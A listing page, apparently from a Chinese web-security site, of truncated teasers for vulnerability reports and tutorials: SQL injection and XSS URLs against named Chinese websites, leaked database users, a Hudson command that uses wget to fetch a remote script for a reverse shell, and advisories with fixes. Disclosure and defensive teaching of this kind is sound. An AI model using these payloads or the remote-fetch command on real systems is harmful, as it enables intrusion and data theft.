桃园网盘通杀所有版本的注入0day及修复 - 网站安关注热度:26

小菜之作 大牛勿笑ps: 官方也存在漏洞未修补 不要乱搞没事蛋疼审计代码挖到两个0day 都是桃园网盘的一个getshell 一个注入以下是注入0dayhttp://www.2cto.com /myly.aspx?username=注册的用户名@乌云..[详情]

书旗小说网SQL注射漏洞及修复 - 网站安全 - 自学关注热度:28

由于没有对参数进行正确过滤，导致SQL注射漏洞漏洞证明：注入点:http://yc.shuqi.com/yc_pagefile/boat.php?action=notice_infonoid=177数据库:book_new版本:5.0.90-log用户名:ppro@172.18.20.215得到的表和用户....[详情]

淘宝网2处反射型xss - 网站安全 - 自学php关注热度:13

http://fang.taobao.com/fang/activities/getLotteryInfo.html?callback=scriptalert(/goderci/)/script【IE 6测试】http://kezhan.trip.taobao.com/remote/citySearch.do?callback={callback}q=11111im.....[详情]

申通快递+如风达快递SQL注入 - 网站安全 - 自学关注热度:20

建议做一下过滤作者Falcon..[详情]

同仁堂集团网站sql注入及修复 - 网站安全 - 自学关注热度:17

中国北京同仁堂（集团）官网存在sql注入漏洞。。好歹也市值:191.53亿元。。详细说明：http://www.tongrentang.com/trtxsqy/introduce_yc.php?id=#39;%60%228rk1BError: exception #39;PDOException#39; wi.....[详情]

Postgresql注入语法指南 - 网站安全 - 自学php关注热度:28

作者：Nana本文很抱歉没有实例，没有截图。像我这个不善于Google的人来说，要找一个Postgresql的注入实例还是不太容易，所以，不解释。只有枯燥的语句，和回显作为例子。SQL软件中，不..[详情]

千博企业网站管理系统HitCount.Asp页面注入漏洞关注热度:16

程序都加入了防注入代码的，在NoSql.asp文件中7kccopyd-code%If EnableStopInjection = True Then Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr Fy_In = rsquo;|;|and|exec|i.....[详情]

首家实名制相亲平台我在找你任意命令执行 - 网关注热度:22

Hudson版本太低，无用户验证功能，可直接任意执行系统命令漏洞证明：http://59.151.1.116:8080/script反弹shelljava.lang.Runtime.getRuntime().exec(#39;wget http://www.XXX.com/uploads/XX.pl -O /tmp/XX.....[详情]

拍客piikee竞拍网站系统注射漏洞及修复 - 网站安关注热度:26

因没有厂商，就写个竞拍系统吧，传出来好给用这系统的站长提个醒。该系统名为：拍客piikee竞拍网站系统为什么说2B那？前台所有文件参数值都这样来的，大家看下这段代码news_arc.ph..[详情]

北京汽车集团官网SQL注射漏洞及修复 - 网站安全关注热度:22

由于没有对参数进行正确过滤，导致SQL注射漏洞详细说明：http://www.baihc.com/website/news_content.php?id=322type=1,此URL的ID字段由于没有对参数进行正确过滤，导致SQL注射漏洞漏洞证明：注入点..[详情]

网站服务器被挂马的处理方案 - 网站安全 - 自学关注热度:20

www.2cto.com：有360软文嫌疑啊本方案主要解决网站的WEB服务器出现木马的情况后，操作指导手册。根据先期摸索处理的经验，整理此文档，若有不足，请指出补充。前言：服务器木马的防..[详情]

Wordpress插件Zingiri Web Shop <= 2.4.0多个xss问题 - 网关注热度:13

Wordpress Zingiri Web Shop Plugin = 2.4.0 Multiple XSS Vulnerabilities作者: Mehmet Ince www.2cto.com程序作者: http://www.zingiri.com影响版本: 2.3.0 和 2.4.0已测试标题： Wordpress.....[详情]

PHP Volunteer Management 1.0.2多个缺陷及修复 - 网站安关注热度:19

标题: PHP Volunteer Management #39;id#39; 1.0.2 Multiple Vulnerabilities作者: G13 www.2cto.com下载地址: https://sourceforge.net/projects/phpvolunteer/影响版本: 1.0.20x01 描述0x02 XS.....[详情]

从分析代码学习挖掘漏洞 - 网站安全 - 自学php关注热度:19

作者注：近日看到论坛上有人发了个全能大牛的文章，颇有感慨。其实所谓的全能，是来自对基础知识的扎实根基。本文虽谈不上全能，也并非什么大做，仅为证明只要根基扎实，你也..[详情]

POST表单与上传突破JS后缀名检查分析 - 网站安全关注热度:29

本文纯属科普文，在看本文前，请简单了解一下GET与POST的区别：《网站表单接收信息提交方式：Get与Post 小讲》如果这个文章你没看懂，或者不想看，那么我来给你更简单的讲一下GET与..[详情]

网站表单接收信息提交方式：Get与Post小讲 - 网站关注热度:26

这个是涉及网络传输安全的，这对SQL注入检测也是至关重要的给大家科普下浏览网站时，网站服务器获取数据主要靠两种方式：Get与postGet：GET是一个HTTP将各种信息提交到服务器方法。..[详情]

服务器架设环境探测分析 - 德国第二电视台网站关注热度:15

先发些手记在这里。看了能不能得到得到灵感。地址：www.zdf.de进去一看，呵，全部是html的。节目表要不断变，百分之九九是动态的，而且有后台。之所以是html的，原因可能有三：1、在..[详情]

东风本田中国官网SQL注射漏洞及修复 - 网站安全关注热度:19

注入点:http://www.dongfeng-honda.com/crv_mediaReport.php?nid=440数据库:honda数据库版本:5.1.41用户名:honda@172.16.1.90数据库目录:/opt/lampp/var/mysql/管理员表名:cdb_club_sys_user管理员帐号:admin密码.....[详情]

新浪Xweibo程序伪造管理员给任意/全体用户发消息关注热度:16

起因是发现了xweibo某个注入漏洞，但是后来发现这个功能是需要管理权限的，总是这样大意。。。不过还是找到点好玩的东西。详细说明：首先xweibo搞了个路由函数，对用户提交的变量..[详情]

SDCMS 1.1sp1的XSS漏洞的挖掘与利用 - 网站安全 - 自关注热度:19

SDCMS全称：时代网站信息管理系统。SDCMS是基于ASP+ACCESS/MSSQL的网站信息管理系统。永久免费，开源！SDCMS以信息为主题，通过以文字和图片标题为起点，以无限栏目分类为支撑，配合多项..[详情]

搜狐网某频道root注入 - 网站安全 - 自学php关注热度:21

http://photo.club.sohu.com/learning/read_art_sub.315.php?artid=38587%20and%201=2%20union%20select%201,2,3,4,user%28%29,6,7,8,9,0,1,2,3%23http://photo.club.sohu.com/auto/read_art_sub.315.php?artid=.....[详情]

Discuz! X2.5 远程代码执行漏洞预警及EXP[XDAY] - 网站关注热度:18

看到discuz dede啥的漏洞一下就精神了，哈哈过程简单说下，记的有点乱不贴太多代码了diff一下看balabalabala.....if(!defined(#39;IN_DISCUZ#39;)) {@@ -89,7 +89,7 @@}}if($searcharray $repla.....[详情]

126disk及XX@mail.ru和PageAdmin XSS 漏洞 - 网站安全 - 自关注热度:25

so.126disk.com/search?key=scriptalert(#39;hacked by wing#39;)/scriptfrom：dis9.comSTYLE #mybody {height:rgb(rsquo;20prime;,20,rsquo;220);/**/height:rgb(lsquo;)=!important height:EX.....[详情]

jdbc防止sql注入-PreparedStatement - 网站安全 - 自学关注热度:17

public List getUserByName(String name,String password){ ResultSet rs = null; PreparedStatement stat = null; Connection conn = null; List list = new ArrayList(); try { conn .....[详情]

凡客某频道SQL注入可导致用户名密码及其他敏感关注热度:14

凡客某频道SQL注入，由于缺乏足够的安全设计和安全隔离，可导致用户账号密码及其他敏感信息泄露，内部数据库账号密码泄露，官方邮箱系统账号密码泄露详细说明：http://en.vancl.com..[详情]

快速找WEB绝对路径目录命令 - 网站安全 - 自学关注热度:17

查看WEB网站安装目录命令：#61548; cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root c:\test1.txt （将2换成1、3、4、5试试）type c:\test1.txtdel c:\test1.txt在NBSI下可以直接显示.....[详情]

MyWorldCMS持久型XSS缺陷及修复 - 网站安全 - 自学关注热度:18

标题: MyWorldCMS XSS Presistent Vulnerability摘自: Angel Injection官网: www.myworldcms.comSecurity -::RISK: High测试证明http://www.2cto.com /calendar.php?id=5 [xss]http://localhost/sear.....[详情]

Havalite CMS v1.0.4多个脚本缺陷及修复 - 网站安全关注热度:14

标题：Havalite CMS v1.0.4 - Multiple Web Vulnerabilities程序简介=============Havalite, a lightweight, open source CMS, based on php and SQLite. It\\\\\\\#39;s licensed under t.....[详情]

ExponentCMS 2.0.5多个缺陷及修复 - 网站安全 - 自学关注热度:14

信息--------------------名称 : XSS and Blind SQL Injection Vulnerabilities in ExponentCMS影像软件 : ExponentCMS 2.0.5 and possibly below.开发网站: http://www.exponentcms.org缺陷类型.....[详情]

Piwigo 2.3.3多重缺陷及修复 - 网站安全 - 自学php关注热度:22

设计产品: Piwigo开发者: Piwigo project缺陷影响版本: 2.3.3及以前已测试本本: 2.3.3缺陷类型: Directory Path Traversal, Cross-Site Scripting (XSS)解决状态: 官方已修复Risk Level: MediumAd.....[详情]